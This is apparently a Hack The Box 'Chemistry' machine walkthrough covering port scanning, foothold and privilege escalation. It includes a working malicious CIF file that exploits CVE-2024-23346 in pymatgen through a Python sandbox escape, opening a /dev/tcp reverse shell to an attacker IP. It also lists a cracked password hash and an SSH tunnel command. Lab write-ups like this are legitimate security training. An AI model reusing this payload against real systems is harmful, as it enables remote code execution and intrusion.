Chemistry
Enumeration
nmap -v -A -O -p- -T4 -Pn -sC chemistry.htb -oN nmapNmap scan report for chemistry.htb (10.10.11.38)
Host is up (0.048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
| 256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_ 256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open http Werkzeug httpd 3.0.3 (Python 3.9.5)
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD
|_http-title: Chemistry - Home
|_http-server-header: Werkzeug/3.0.3 Python/3.9.5
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Uptime guess: 8.610 days (since Tue Dec 31 18:57:15 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 47.28 ms 10.10.14.1
2 47.83 ms chemistry.htb (10.10.11.38)If we try to enumerate some directories or files we will obtain this:
Foothold (app)
Searching on Google for some resources related to CIF files and exploit available, we will find that CVE-2024-23346
https://www.vicarius.io/vsociety/posts/critical-security-flaw-in-pymatgen-library-cve-2024-23346
Using this malicious file CIF we can obtain a reverse shell:
data_Example
_cell_length_a 10.00000
_cell_length_b 10.00000
_cell_length_c 10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta 90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
_atom_site_label
_atom_site_fract_x
_atom_site_fract_y
_atom_site_fract_z
_atom_site_occupancy
H 0.00000 0.00000 0.00000 1
O 0.50000 0.50000 0.50000 1
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.14.86/4444 0>&1\'");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "Running a netcat listener and viewing the malicious file uploaded we will obtain a reverse shell:
Privilege Escalation
We can't read the rosa file user.txt containing the flag, so we need to escalate our user:
Analyze the SQLite database using sqlite3:
We will obtain the hash MD5 password of user "rosa", try to crack it:
63ed86ee9f624c7b14f1d4f43dc251a5 -> unicorniosrosados
Easy man 👮, use SSH to login as rosa and get the user flag:
Privilege Escalation (root)
Using LinPeas we can find that machine is vulnerable to CVE-2021-3560 but seems to be a false positive. Deep dive...
We can look at active ports on machine other than 22 and 5000. There is 8080 running port:
curling the 8080 port we will obtain this result:
To explore website as a local website, we can use SSH Local Port Forwarding (L-Tunnel):
ssh -L 8080:localhost:8080 [email protected]The web server seems to be strange:
Using whatweb we can find the correct webserver provided by HTTP Headers:
Searching on Google we can find a Path Traversal vulnerability:
To succesfully run the exploit we need to find a payload directory on which run path traversal exploit:
Easy ffuf as always:
Modify the script:
Finally read the root flag 🎉
Last updated